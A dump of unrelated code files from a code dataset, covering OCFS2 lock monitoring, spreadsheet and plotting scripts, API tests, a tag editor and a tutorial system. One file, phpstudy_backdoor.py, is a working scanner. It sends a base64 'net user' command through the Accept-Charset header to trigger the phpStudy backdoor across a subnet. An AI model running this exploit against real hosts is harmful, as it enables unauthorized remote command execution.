platform.system().lower():\n LINUX = True\nelse:\n LINUX = False\n\ndef get_remote_path(ip):\n prefix = \"ssh root@{0} \".format(ip)\n cmd = \"echo '$PATH'\"\n sh = shell.shell(prefix + cmd)\n ret = sh.output()\n return ret\n\ndef get_remote_cmd_list(ip):\n path = get_remote_path(ip)\n prefix = \"ssh root@{0} \".format(ip)\n ret = []\n #cmd = 'for i in `echo $PATH|sed \"s/:/ /g\"`; do ls $i | grep -v \"^d\"; done'\n if len(path) == 0:\n return []\n for i in path[0].split(':'):\n cmd = 'ls {0}'.format(i)\n sh = shell.shell(prefix + cmd)\n ret = ret + sh.output()\n return ret\n\ndef cmd_is_exist(cmd_list, ip=None):\n assert type(isinstance(cmd_list,list))\n if not ip:\n cmds = []\n cmdpaths = os.environ['PATH'].split(':')\n for cmdpath in cmdpaths:\n if os.path.isdir(cmdpath):\n cmds += os.listdir(cmdpath)\n else:\n cmds = get_remote_cmd_list(ip)\n for cmd in cmd_list:\n if cmd not in cmds:\n return False, cmd\n return True, None\n\ndef get_hostname():\n return socket.gethostname()\n\ndef now():\n return datetime.datetime.now()\n\ndef sleep(interval):\n return time.sleep(interval)\n\ndef uname_r(ip=None):\n prefix = \"ssh root@{0} \".format(ip) if ip else \"\"\n cmd = \"uname -r\"\n sh = shell.shell(prefix + cmd)\n ret = sh.output()\n return ret\n\ndef is_kernel_ocfs2_fs_stats_enabled(ip=None):\n uname = uname_r(ip)\n prefix = \"ssh root@{0} \".format(ip) if ip else \"\"\n cmd = \"grep \\\"CONFIG_OCFS2_FS_STATS=y\\\" /boot/config-{uname}\".format(\n uname=\" \".join(uname))\n sh = shell.shell(prefix + cmd)\n ret = sh.output()\n if len(ret) == 0:\n return False\n if ret[0] == \"CONFIG_OCFS2_FS_STATS=y\":\n return True\n return False\n\ndef prompt_sshkey_copy_id(ip=None):\n answer = input(\"Did you run ssh-copy-id to the remote node?[Y/n]\")\n return answer in ['Y', 'y']\n\n\ndef get_one_cat(lockspace, ip=None):\n prefix = \"ssh root@{0} \".format(ip) if ip else \"\"\n cmd = \"cat /sys/kernel/debug/ocfs2/{lockspace}/locking_state\".format(\n lockspace=lockspace)\n sh = shell.shell(prefix + cmd)\n ret = sh.output()\n if len(ret) == 0:\n eprint(\"{cmd} on {ip} return len=0\".format(cmd=cmd, ip=ip))\n return ret\n\n# fs_stat\n\"\"\"\n Device => Id: 253,16 Uuid: 7635D31F539A483C8E2F4CC606D5D628 Gen: 0x6434F530 Label:\n Volume => State: 2 Flags: 0x0\n Sizes => Block: 4096 Cluster: 4096\n Features => Compat: 0x3 Incompat: 0xB7D0 ROcompat: 0x1\n Mount => Opts: 0x104 AtimeQuanta: 60\n Cluster => Stack: pcmk Name: 7635D31F539A483C8E2F4CC606D5D628 Version: 1.0\n DownCnvt => Pid: 3802 Count: 0 WakeSeq: 707 WorkSeq: 707\n Recovery => Pid: -1 Nodes: None\n Commit => Pid: 3810 Interval: 0\n Journal => State: 1 TxnId: 2 NumTxns: 0\n Stats => GlobalAllocs: 0 LocalAllocs: 0 SubAllocs: 0 LAWinMoves: 0 SAExtends: 0\nLocalAlloc => State: 1 Descriptor: 0 Size: 27136 bits Default: 27136 bits\n Steal => InodeSlot: -1 StolenInodes: 0, MetaSlot: -1 StolenMeta: 0\nOrphanScan => Local: 117 Global: 248 Last Scan: 5 seconds ago\n Slots => Num RecoGen\n * 0 1\n 1 0\n 2 0\n 3 0\n 4 0\n 5 0\n 6 0\n 7 0\n\"\"\"\ndef major_minor_to_device_path(major, minor, ip=None):\n prefix = \"ssh root@{0} \".format(ip) if ip else \"\"\n cmd = \"lsblk -o MAJ:MIN,KNAME,MOUNTPOINT -l | grep '{major}:{minor}'\"\\\n .format( major=major,minor=minor)\n output = shell.shell(prefix + cmd)\n #output should be like\n \"\"\"\n MAJ:MIN KNAME\n 253:0 vda\n 253:1 vda1\n 253:2 vda2\n 253:16 vdb\n \"\"\"\n assert(len(output) > 0)\n device_name = output[0].split()[1]\n return device_name\n\ndef eprint(msg):\n print(msg, file=sys.stdout)\n # print(msg, file=sys.stderr)\n\ndef lockspace_to_device(uuid, ip=None):\n cmd = \"cat /sys/kernel/debug/ocfs2/{uuid}/fs_state | grep 'Device =>'\"\\\n .format(uuid=uuid)\n prefix = \"ssh root@{0} \".format(ip) if ip else \"\"\n sh = shell.shell(prefix + cmd)\n output = sh.output()\n if len(output) == 0:\n err_msg = \"\\n\\nError while detecting the mount point {uuid} on {ip}\\n\\n\".format(\n uuid=uuid, ip=ip)\n eprint(err_msg)\n return\n #output should be like\n \"\"\"\n Device => Id: 253,16 Uuid: 7635D31F539A483C8E2F4CC606D5D628 Gen: 0x6434F530 Label:\n \"\"\"\n dev_major, dev_minor = output[0].split()[3].split(\",\")\n # the space must be required\n cmd = \"lsblk -o MAJ:MIN,KNAME,MOUNTPOINT -l | grep '{major}:{minor} '\" \\\n .format(major=dev_major,minor=dev_minor)\n sh = shell.shell(prefix + cmd)\n #before grep output should be like\n \"\"\"\n MAJ:MIN KNAME MOUNTPOINT\n 253:0 vda\n 253:1 vda1 [SWAP]\n 253:2 vda2 /\n 253:16 vdb /mnt/ocfs2-1\n \"\"\"\n #after grep\n \"\"\"\n 253:16 vdb /mnt/ocfs2-1\n \"\"\"\n output = sh.output()\n assert(len(output) > 0)\n device_name, mount_point = output[0].split()[1:]\n return dev_major, dev_minor, mount_point\n #device_name = major_minor_to_device_path(dev_major, dev_minor)\n #return device_name\n\ndef get_dlm_lockspaces(ip=None):\n prefix = \"ssh root@{0} \".format(ip) if ip else \"\"\n cmd = \"dlm_tool ls | grep ^name\"\n sh = shell.shell(prefix + cmd)\n output = sh.output()\n lockspace_list = [i.split()[1] for i in output]\n if len(lockspace_list):\n return lockspace_list\n return None\n\ndef get_dlm_lockspace_mp(ip, mount_point):\n prefix = \"ssh root@{0} \".format(ip) if ip else \"\"\n cmd = \"o2info --volinfo {0} | grep UUID\".format(mount_point)\n sh = shell.shell(prefix + cmd)\n output = sh.output()\n if (len(output) == 1):\n if config.UUID == None or config.UUID == \"\":\n config.UUID = output[0].split()[1]\n return output[0].split()[1]\n return None\n\ndef _trans_uuid(uuid):\n if not uuid:\n return None\n uuid = uuid.lower()\n return \"{0}-{1}-{2}-{3}-{4}\".format(uuid[:8],uuid[8:12],uuid[12:16],uuid[16:20],uuid[20:])\n\ndef get_dlm_lockspace_max_sys_inode_number(ip, mount_point):\n uuid = _trans_uuid(get_dlm_lockspace_mp(ip, mount_point))\n if not uuid:\n eprint(\"o2locktop: error: can't find the mount point: {0}, please cheach and retry\".format(mount_point))\n prefix = \"ssh root@{0} \".format(ip) if ip else \"\"\n cmd = \"blkid | grep {0}\".format(uuid)\n output = shell.shell(prefix + cmd).output()\n \n if (len(output) == 1):\n filesystem = output[0].split()[0].strip()[:-1]\n if filesystem[-1] == '/':\n filesystem = filesystem[:-1] \n else:\n return None\n # TODO:fix shell\n prefix = \"ssh root@{0} \".format(ip) if ip else \"\"\n cmd = \"debugfs.ocfs2 -R \\\"ls //\\\" {0}\".format(filesystem)\n output = shell.shell(prefix + cmd).output()\n if len(output) > 0:\n return int(output[-1].split()[0])\n return None\n\n\"\"\"\nlchen-vanilla-node1:~/code # mount | grep \"type ocfs2\" | cut -f1\n/dev/vdb on /mnt/ocfs2 type ocfs2 (rw,relatime,heartbeat=none,nointr,data=ordered,errors=remount-ro,atime_quantum=60,cluster_stack=pcmk,coherency=full,user_xattr,acl)\n/dev/vdb on /mnt/ocfs2-1 type ocfs2 (rw,relatime,heartbeat=none,nointr,data=ordered,errors=remount-ro,atime_quantum=60,cluster_stack=pcmk,coherency=full,user_xattr,acl)\n\"\"\"\ndef device_to_mount_points(device, ip=None):\n prefix = \"ssh root@{0} \".format(ip) if ip else \"\"\n cmd = \"mount | grep 'type ocfs2'\"\n sh = shell.shell(prefix + cmd)\n output = sh.output()\n dev_stat = os.stat(device)\n dev_num = dev_stat.st_rdev\n\n ret = []\n for i in output:\n i = i.split()\n _dev = i[0]\n if os.stat(_dev).st_rdev == dev_num:\n ret.append(i[2])\n return list(set(ret))\n\ndef clear_screen():\n os.system(\"clear\")\n\n\n\ndef kill():\n os.killpg(os.getpgid(0), signal.SIGKILL)\n","sub_path":"o2locktoplib/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":8324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"355713505","text":"from openpyxl import load_workbook\n\n\nclass excelop:\n def excelread(self):\n listchecklist = []\n workbook = load_workbook(r\"../config/case.xlsx\")\n sheets = workbook[\"Sheet1\"]\n rows_sheet = sheets.iter_rows() # 读取每一行\n\n for item in rows_sheet:\n if item[0].value == \"url\":\n continue\n listes = []\n for col in item:\n listes.append(col.value)\n\n listchecklist.append(listes)\n\n return listchecklist","sub_path":"excel/excelop.py","file_name":"excelop.py","file_ext":"py","file_size_in_byte":518,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"619695366","text":"# script to make a spatial polygon plot from a shapefile and data\n# to run, need python 2.7\n# on cheyenne, type: module load python/2.7.16; ncar_pylib\n\n# set up modules\nimport sys\nimport numpy as np\n\nsys.path.append('/glade/u/home/andywood/proj/jtti/scripts/analysis/utils/')\nsys.path.append('/glade/work/eriddle/python_eriddle/lib/python2.7/site-packages/')\nimport plotting_utils\nimport Nio\nimport pdb\n\n# variable to plot\nplot_var = 'airtemp_mean'\ndata_tstep = 0 # timestep number to extract from data file\n\n# filenames\ndata_file = '~/proj/SHARP/wreg/cali_huc12/output/3hr/cali_huc12.3hr.merged.nc'\nshp_file = '/glade/u/home/andywood/proj/SHARP/wreg/WORK/gis/shapes/cali_huc12/CALI_huc12_v5.shp'\nplot_file = './'+plot_var+'.png'\n\n\n# open data file\nf = Nio.open_file(data_file)\n\n# order number of attribute in shapefile that matches poly to data index ('datacid')\njoinid_index = 20 # starting at 0 for first attribute\n\n# read data\ndatacid = f.variables['hruId'][:] # id in the data file that matches the shapes\ndata = f.variables[plot_var][data_tstep,:] # get timestep 0 for all hrus. [time,hru]\n\n\n# plot data (call function from ./utils/ dir)\nplotting_utils.catchment_plot(data, datacid, shp_file, joinid_index, plot_file)\n\nsys.exit(0)\n","sub_path":"analysis/plot_catchment/plot_catchments.simple.py","file_name":"plot_catchments.simple.py","file_ext":"py","file_size_in_byte":1249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"513592192","text":"# -*- coding: utf-8 -*-\nimport pytest\nfrom nose.plugins.attrib import attr\nfrom ..base_wbs_api import WBSAPIBaseTestMixin\nimport unittest\nfrom fake_data import FakeData\nimport sys\nimport types\nimport os\nfrom API import config\n\nreload(sys)\nsys.setdefaultencoding('utf-8')\n\n\n@attr('internal')\n@attr('externalopen')\nclass InvestorProductDetailsTest(WBSAPIBaseTestMixin, unittest.TestCase):\n phone = FakeData().phone_number()\n\n expected_response_format = {\n \"success\": bool,\n \"msg\": unicode,\n \"errorCode\": types.NoneType,\n \"data\": {\n \"id\": int,\n \"name\": unicode,\n \"property\": int,\n \"source\": int,\n \"categoryProperty\": int,\n \"categoryId\": int,\n \"categoryName\": unicode,\n \"minAmount\": float,\n \"currencyUnit\": unicode,\n \"term\": unicode,\n \"annualReturn\": unicode,\n \"introduction\": unicode,\n \"productReview\": unicode,\n \"productLight\": unicode,\n \"netValue\": unicode,\n \"statusStr\": unicode,\n \"status\": int,\n \"releaseStatus\": int,\n \"seq\": int,\n \"currency\": int,\n \"currencyStr\": unicode,\n \"smallPic\": unicode,\n \"bigPic\": unicode,\n \"productMarketingCopy\": unicode,\n \"riskInformation\": unicode,\n \"accountName\": unicode,\n \"bankName\": unicode,\n \"accountNo\": unicode,\n \"memo\": unicode,\n \"riskLevel\": int,\n \"riskValue\": int,\n \"riskName\": unicode,\n \"riskLevelName\": unicode,\n \"outId\": int,\n \"videos\": [\n {\n \"fileUrl\":unicode,\n \"fileName\":unicode,\n \"snapFile\":unicode,\n \"fileType\":unicode\n }\n ],\n \"pdfs\": list,\n \"announcements\": unicode\n }\n }\n\n @classmethod\n def setUpClass(cls):\n # 查询产品分类列表\n cls.view_url = 'categoryGroupList.json'\n token = cls.generate_investor_token()\n data_dict = {\n \"token\": token,\n \"param\": {}\n }\n cls.data = 'data={0}'.format(cls.dict_to_json(data_dict))\n super(InvestorProductDetailsTest, cls).setUpClass()\n #此处拿到的categoryId,调用selectByCategory接口得到的产品有可能为空,也就会出现数组越界错误,目前咱们没有接口能通过categoryproperty来取产品\n categoryId = cls.response['data']['data'][0][-2]['id']\n # 根据产品分类查询产品列表\n cls.view_url = config.select_by_category[os.getenv('api_type', None)]\n data_dict = {\n \"token\": token,\n \"param\": {\n \"categoryId\": categoryId\n }\n }\n cls.data = 'data={0}'.format(cls.dict_to_json(data_dict))\n cls.response = cls.do_request(cls.data)\n value = cls.response['data']['data'][0]['id']\n # 查询产品详情\n cls.view_url = 'productDetail.json'\n data_dict = {\n \"token\": token,\n \"param\": {\n \"value\": value\n }\n }\n cls.data = 'data={0}'.format(cls.dict_to_json(data_dict))\n super(InvestorProductDetailsTest, cls).setUpClass()\n","sub_path":"automation-testing/API/wbs/investor/tests_productDetail.py","file_name":"tests_productDetail.py","file_ext":"py","file_size_in_byte":3389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"614145890","text":"# -*-coding:utf-8 -*-\n\nimport threading\nimport requests\nimport base64\nimport ipaddress\nimport sys\nimport queue\n\nThreadNumber = 100\nTIME_OUT = 5\ntaskQueuehandle = queue.Queue()\nhttp_headers = {\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0\",\n \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\",\n \"Accept-Language\": \"zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3\",\n \"Connection\": \"close\",\n \"Accept-Encoding\": \"gzip,deflate\",\n \"Accept-Charset\": \"ZWNobyBzeXN0ZW0oIm5ldCB1c2VyIik7\",\n \"Upgrade-Insecure-Requests\": \"1\",\n}\nf = open(\"url.txt\",\"a+\")\n\nclass Check(threading.Thread):\n def __init__(self):\n threading.Thread.__init__(self)\n\n def run(self):\n global taskQueuehandle,http_headers\n while 1:\n try:\n url = taskQueuehandle.get(timeout=0.5)\n result = requests.get(url,headers = http_headers,timeout = TIME_OUT)\n self.callback(result,url)\n except queue.Empty:\n # stopFlag = False\n break\n except requests.exceptions.RequestException:\n print(f'{url} requests error')\n continue\n\n def callback(self,res,url):\n if (\"Administrator\" in res.text) or (\"DefaultAccount\" in res.text) or (\"Guest\" in res.text):\n f.write(url)\n f.write(\"\\n\")\n f.flush()\n print(f'{url} have a backdoor')\n else:\n print(f'{url}')\n\ndef main():\n global taskQueuehandle\n ips = ipaddress.ip_network(\"192.168.220.0/24\")\n for ip in ips.hosts():\n ip_to_url = (\"http://\" + str(ip)).rstrip()\n taskQueuehandle.put(ip_to_url)\n threadlist = []\n for i in range(ThreadNumber):\n work = Check()\n threadlist.append(work)\n for t in range(ThreadNumber):\n threadlist[t].start()\n for t in range(ThreadNumber):\n threadlist[t].join()\n\n\nif __name__ == '__main__':\n main()\n f.close()\n","sub_path":"phpstudy_backdoor.py","file_name":"phpstudy_backdoor.py","file_ext":"py","file_size_in_byte":2010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"227968","text":"#!/usr/bin/python3\n\"\"\" Contains the Base class. \"\"\"\nimport json\n\n\nclass Base():\n \"\"\" I'm the base for everything! \"\"\"\n __nd_objects = 0\n\n def __init__(self, id=None):\n \"\"\" Initializes the attributes. \"\"\"\n if id is not None:\n self.id = id\n else:\n Base.__nd_objects += 1\n self.id = Base.__nd_objects\n\n @staticmethod\n def to_json_string(list_dictionaries):\n \"\"\" Returns the JSON string representation of list_dictionaries. \"\"\"\n if list_dictionaries is None:\n return \"[]\"\n return json.dumps(list_dictionaries)\n\n @classmethod\n def save_to_file(cls, list_objs):\n \"\"\" Writes the JSON string representation of list_bjs to a file. \"\"\"\n if list_objs and len(list_objs) > 0:\n objs = list_objs.copy()\n for i in range(len(objs)):\n objs[i] = objs[i].to_dictionary()\n else:\n objs = []\n with open(\"{}.json\".format(cls.__name__), 'w') as f:\n f.write(cls.to_json_string(objs))\n\n @staticmethod\n def from_json_string(json_string):\n \"\"\" Returns the list of the JSON string representation. \"\"\"\n if not json_string or len(json_string) < 1:\n return []\n return json.loads(json_string)\n\n @classmethod\n def create(cls, **dictionary):\n \"\"\" Returns an instance with all attributes already set. \"\"\"\n if cls.__name__ == \"Square\":\n new = cls(1)\n else:\n new = cls(1, 1)\n new.update(**dictionary)\n return new\n\n @classmethod\n def load_from_file(cls):\n \"\"\" Returns a list of instances. \"\"\"\n try:\n with open(\"{}.json\".format(cls.__name__), 'r') as f:\n l = cls.from_json_string(f.read())\n for i in range(len(l)):\n l[i] = cls.create(**l[i])\n except:\n return []\n return l\n","sub_path":"0x0C-python-almost_a_circle/models/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":1932,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"595870391","text":"import pandas as pd\nimport numpy as np\nfrom copy import deepcopy\nfrom multiprocessing import Pool\n\ndf = pd.read_csv('movie_train.csv')\n# df = pd.read_csv('ms_train.csv')\ndf = df.fillna(0)\ndf = df.set_index('Unnamed: 0', drop = True)\n\n# define s and c matrix, s is the raw score, c is 1 if value exists, 0 else.\ns = deepcopy(df)\nc = df\n\nc[c>0] = 1\n\ndef MSD(i, j):\n num = 0\n dem = 0 \n for n in range(s.shape[1]):\n num += c.iloc[i, n]*c.iloc[j,n]*(s.iloc[i, n]-s.iloc[j, n])**2\n dem += c.iloc[i, n]*c.iloc[j,n]\n return(num/dem)\n\ndef calc_MSD(part):\n # part is the starting point of the iteration. chunk is the chunk size, so each worker\n # will work on a chunk size of 50.\n chunk = 50\n start = part\n if ((part + chunk) > s.shape[0]):\n finish = s.shape[0]\n else:\n finish = part+chunk\n \n # we create a D matrix for each worker\n D = [[0 for i in range(s.shape[0])] for i in range(finish-start)] \n for x, i in enumerate(range(start, finish, 1)):\n for y, j in enumerate(range(s.shape[0])):\n D[x][y] = MSD(i, j)\n return(D)\n\np = Pool(64)\n# a is a list of matrices generated by each worker in the pool\na = p.map(calc_MSD, list(range(0, s.shape[0], 50)))\n\n# flatten our a and put into one big matrix, then write to csv.\noutput = pd.DataFrame([item for sublist in a for item in sublist])\noutput.columns = list(df.index)\noutput.index = list(df.index)\noutput.to_csv('MSDsim_movie.csv')\n# output.to_csv('MSDsim_ms.csv')\n","sub_path":"doc/msd.py","file_name":"msd.py","file_ext":"py","file_size_in_byte":1506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"331429767","text":"#!/usr/bin/env python\nfrom os import listdir, devnull\nimport subprocess\nimport mutagen.id3\nimport mutagen.flac\n\ndef qRun(command):\n with open(devnull) as redir:\n subprocess.run(\n command,\n stdout = redir,\n stderr = redir)\n\ndef convert(song):\n print(\"Converting \"+song+\" to mp3\")\n newsong = song[:song.rfind(\".\")]+\".mp3\"\n command = [\n \"ffmpeg\",\n \"-i\", song,\n \"-ab\", \"320k\",\n newsong\n ]\n qRun(command)\n qRun([\"rm\", song])\n return newsong\n\nartist = input(\"Artist? \")\nalbum = input(\"Album? \")\nyear = input(\"Year? \")\n\nprint(\"\")\nfiles = listdir(\"./\")\nsongs = []\ncover =[]\nfor f in files:\n ext = f[ f.rfind('.')+1 :]\n if ext in [\"mp3\"]:\n songs.append(f)\n elif ext in [\"flac\", \"m4a\"]:\n newf = convert(f)\n songs.append(newf)\n elif \"cover\" in f:\n cover.append(f)\n\nprint(\"\\nUpdating tags:\")\nfor song in songs:\n print(song)\n k = song.find(' ')\n l = song.rfind('.')\n # Find track number and title\n num = song[:k]\n title = song[k+1:l]\n\n # Set tags\n tags = mutagen.id3.ID3()\n tags[\"TALB\"] = mutagen.id3.TALB(text=album)\n tags[\"TDRC\"] = mutagen.id3.TDRC(text=year)\n tags[\"TIT2\"] = mutagen.id3.TIT2(text=title)\n tags[\"TPE1\"] = mutagen.id3.TPE1(text=artist)\n tags[\"TRCK\"] = mutagen.id3.TRCK(text=num)\n if len(cover) == 1:\n tags[\"APIC\"] = mutagen.id3.APIC(\n mime=\"image/jpeg\",\n data=open(cover[0], 'rb').read()\n )\n # Save tags\n tags.save(song)\n\nif len(cover) != 1:\n print(\"\\nProblems with cover\")\n","sub_path":"tagedit.py","file_name":"tagedit.py","file_ext":"py","file_size_in_byte":1597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"571905226","text":"#!/usr/bin/env python\n\n'''\nZemax .zmx file reading utility. Returns a Lens class\n'''\n\n#import lens\n\n# List of starting tokens\nTOKENS = ['VERS',\n 'MODE',\n 'NAME',\n 'NOTE',\n 'PFIL',\n 'UNIT',\n 'ENPD',\n 'ENVD',\n 'GFAC',\n 'GCAT',\n 'RAIM',\n 'PUSH',\n 'SDMA',\n 'FTYP',\n 'ROPD',\n 'PICB',\n 'XFLN',\n 'YFLN',\n 'FWGN',\n 'VDXN',\n 'VDYN',\n 'VCYN',\n 'VANN',\n 'WAVM',\n 'PWAV',\n 'POLS',\n 'GLRS',\n 'GSTD',\n 'NSCD',\n 'COFN',\n 'SURF',\n 'TYPE',\n 'CURV',\n 'HIDE',\n 'MIRR',\n 'SLAB',\n 'DISZ',\n 'DIAM',\n 'POPS',\n 'COMM',\n 'STOP',\n 'COAT',\n 'GLAS',\n 'FLAP',\n 'BLNK',\n 'TOL',\n 'MNUM',\n 'MOFF']\n\ndef read_zmx(filename):\n '''\n Function to read a .zmx file and return a lens class\n\n Inputs:\n filename: Name of file to read\n\n Outputs:\n lens: A Lens class with all configurations in place\n '''\n # Read all lines first\n f = open(filename, 'r')\n\n lines = f.readlines()\n return lines\n\ndef _parse_line(line): \n '''\n Parse a single line and find out tokens and values.\n\n Inputs:\n line: Single line string with tokens separated by spaces\n '''\n # First split\n tokens = line.split(' ')\n\n # Convert any numbers in tokens\n for idx in range(len(tokens)):\n try:\n tokens[idx] = float(tokens[idx])\n except:\n pass\n\n return tokens\n","sub_path":"ray_tracing/zemax.py","file_name":"zemax.py","file_ext":"py","file_size_in_byte":1749,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"435474453","text":"import unittest\n\nfrom backend.utils.braacket_connection import Braacket\nfrom backend.utils.psyonix_api_handler import get_bot_by_steam_id, get_rank, get_empty_data\nfrom tests.utils import initialize_db_with_replays, clear_dir\n\n\nclass BraacketTest(unittest.TestCase):\n\n @classmethod\n def setUpClass(cls):\n cls.league = Braacket()\n replays = [\n 'https://cdn.discordapp.com/attachments/493849514680254468/576877585896570920/ALL_STAR.replay',\n 'https://cdn.discordapp.com/attachments/493849514680254468/576877550891171860/ALL_STAR_SCOUT.replay',\n 'https://cdn.discordapp.com/attachments/493849514680254468/560580395276566548/SKYBOT_DRIBBLE_INFO.replay',\n ]\n initialize_db_with_replays(replays);\n\n def test_get_player(self):\n bot = get_bot_by_steam_id(\"b086f2d2abb\")\n self.assertEqual(bot, \"SkyBot\")\n braacket_id = self.league.player_cache.get(bot)\n skybot_id = \"54FB8C16-6FA9-4C4A-AAD5-3DB8A6AE169B\"\n self.assertEqual(braacket_id, skybot_id)\n ranking_info = self.league.get_ranking(braacket_id)\n self.assertIsNotNone(ranking_info)\n\n def test_get_non_existing_bot(self):\n self.assertIsNone(get_bot_by_steam_id(\"notABot\"))\n self.assertIsNone(self.league.player_cache.get(\"notABot\"))\n self.assertIsNone(self.league.get_ranking(\"notABot\"))\n self.assertIsNone(get_bot_by_steam_id(\"bNotABotb\"))\n\n def test_get_bot_by_steam_id_allstars(self):\n bot = get_bot_by_steam_id(\"bcfe70a272b\")\n self.assertEqual(bot, \"Allstar\")\n bot = get_bot_by_steam_id(\"b40b\")\n self.assertEqual(bot, \"Allstar\")\n\n def test_get_rank_bot(self):\n unranked_rank = get_empty_data([\"b086f2d2abb\"])\n rank = get_rank(\"b086f2d2abb\")\n self.assertNotEqual(unranked_rank[list(unranked_rank.keys())[0]].get('10'), rank.get('10'))\n self.assertEqual(unranked_rank[list(unranked_rank.keys())[0]].get('13'), rank.get('13'))\n self.assertEqual(unranked_rank[list(unranked_rank.keys())[0]].get('11'), rank.get('11'))\n\n @classmethod\n def tearDownClass(cls) -> None:\n clear_dir()\n","sub_path":"tests/backend_utils_tests/braacket_test.py","file_name":"braacket_test.py","file_ext":"py","file_size_in_byte":2155,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"146489548","text":"# This file holds the function definition for the Lorenz system in the\r\n# frequency domain.\r\n\r\nimport numpy as np\r\n\r\n# define parameters\r\nparameters = {'rho': 28, 'beta': 8/3, 'sigma': 10}\r\n\r\ndef response(x, defaults = parameters):\r\n # unpack defaults\r\n rho = defaults['rho']\r\n beta = defaults['beta']\r\n sigma = defaults['sigma']\r\n\r\n # intialise response vector\r\n response = np.zeros(np.shape(x))\r\n\r\n # assign response\r\n response[:, 0] = sigma*(x[:, 1] - x[:, 0])\r\n response[:, 1] = (rho*x[:, 0]) - x[:, 1] - (x[:, 0]*x[:, 2])\r\n response[:, 2] = (x[:, 0]*x[:, 1]) - (beta*x[:, 2])\r\n\r\n return response\r\n\r\ndef jacobian(x, defaults = parameters):\r\n # unpack defaults\r\n rho = defaults['rho']\r\n beta = defaults['beta']\r\n sigma = defaults['sigma']\r\n\r\n # initialise jacobian matrix\r\n jacobian = np.zeros([np.shape(x)[0], np.shape(x)[1], np.shape(x)[1]])\r\n\r\n # compute jacobian elements\r\n jacobian[:, 0, 0] = -sigma\r\n jacobian[:, 0, 1] = sigma\r\n jacobian[:, 1, 0] = rho - x[:, 2]\r\n jacobian[:, 1, 1] = -1\r\n jacobian[:, 1, 2] = -x[:, 0]\r\n jacobian[:, 2, 0] = x[:, 1]\r\n jacobian[:, 2, 1] = x[:, 0]\r\n jacobian[:, 2, 2] = -beta\r\n\r\n return np.squeeze(jacobian)\r\n\r\ndef nl_factor(x, defaults = parameters):\r\n # initialise output vector\r\n nl_vector = np.zeros(np.shape(x))\r\n\r\n # assign values\r\n nl_vector[:, 1] = -x[:, 0]*x[:, 2]\r\n nl_vector[:, 2] = x[:, 0]*x[:, 1]\r\n\r\n return nl_vector\r\n\r\n# def nl_factor2(x, defaults = parameters):\r\n# # initialise output vector\r\n# nl_vector = np.zeros(2)\r\n\r\n# # assign values\r\n# nl_vector[0] = x[0]*x[2]\r\n# nl_vector[1] = x[0]*x[1]\r\n\r\n# return nl_vector\r\n\r\n# def nl_factor_derv(x, defaults = parameters):\r\n# # initialise output matrix\r\n# nl_derv_mat = np.zeros([2, 3])\r\n\r\n# # assign values\r\n# nl_derv_mat[0, 0] = x[2]\r\n# nl_derv_mat[0, 2] = x[0]\r\n# nl_derv_mat[1, 0] = x[1]\r\n# nl_derv_mat[1, 1] = x[0]\r\n\r\n# return nl_derv_mat\r\n","sub_path":"ResolventSolver/systems/lorenz.py","file_name":"lorenz.py","file_ext":"py","file_size_in_byte":2002,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"36791649","text":"#!/usr/bin/env python3\r\n\r\n'''\r\nWelcome to the Learning Environment for Advanced Python!\r\n If this is your first time here, don't worry, it starts out easy.\r\n To get you started there is a tutorial and help system in place to\r\n introduce you to both the python language and using this environment.\r\n \r\n To see this menu again, run the command \"showhelp()\"\r\n'''\r\n\r\nfrom functools import wraps\r\n\r\nglobal_challenge_list = []\r\nglobal_help_data = []\r\n\r\ndef helper(func):\r\n global_help_data.append(func)\r\n @wraps(func)\r\n def wrap(*args, **kwargs):\r\n return func(*args, **kwargs)\r\n return wrap\r\n\r\ndef challenge(**params):\r\n def wrapper(func):\r\n if not 'name' in params: params['name'] = func.__name__\r\n params['challenge'] = func.__name__\r\n params['module'] = func.__module__\r\n params['example_data'] = func().question()\r\n params['example_answer'] = func().answer(params['example_data'])\r\n @wraps(func)\r\n def wrap(solution):\r\n if not params in __list_challenges__():\r\n print('ERROR! You have not unlocked this challenge yet!\\n')\r\n return False\r\n for i in range(100):\r\n problemcache = func().question()\r\n actualsolution = func().answer(problemcache)\r\n proposedsolution = solution(problemcache)\r\n if not actualsolution == proposedsolution:\r\n print('Solution failed!')\r\n print('Data you were given: {}'.format(repr(problemcache)))\r\n print('Solution expected : {}'.format(repr(actualsolution)))\r\n print('Solution given : {}\\n'.format(repr(proposedsolution)))\r\n return False\r\n else:\r\n print('You have completed {}!'.format(params['name']))\r\n if not 'solved' in params or params['solved'] == False:\r\n params['solved'] = True\r\n if 'points' in params:\r\n print('You have gained {} points. Your total score is now {}.'.format(params['points'], __score__()))\r\n print(\"\")\r\n return True\r\n return wrap\r\n global_challenge_list.append(params)\r\n return wrapper\r\n \r\ndef __score__():\r\n return sum([ i['points'] for i in global_challenge_list if ('points' in i and 'solved' in i and i['solved'] == True) ])\r\n\r\ndef __list_challenges__():\r\n cached_score = __score__()\r\n return [i for i in global_challenge_list if not 'unlock' in i or cached_score >= i['unlock']]\r\n\r\n@helper\r\ndef showhelp(func=None):\r\n '''\\\r\nThe help menu!\r\nUsage is help() -or- help(function)\r\n '''\r\n if not func:\r\n print(__doc__)\r\n print(\"Here is a list of available helper functions:\")\r\n for i in 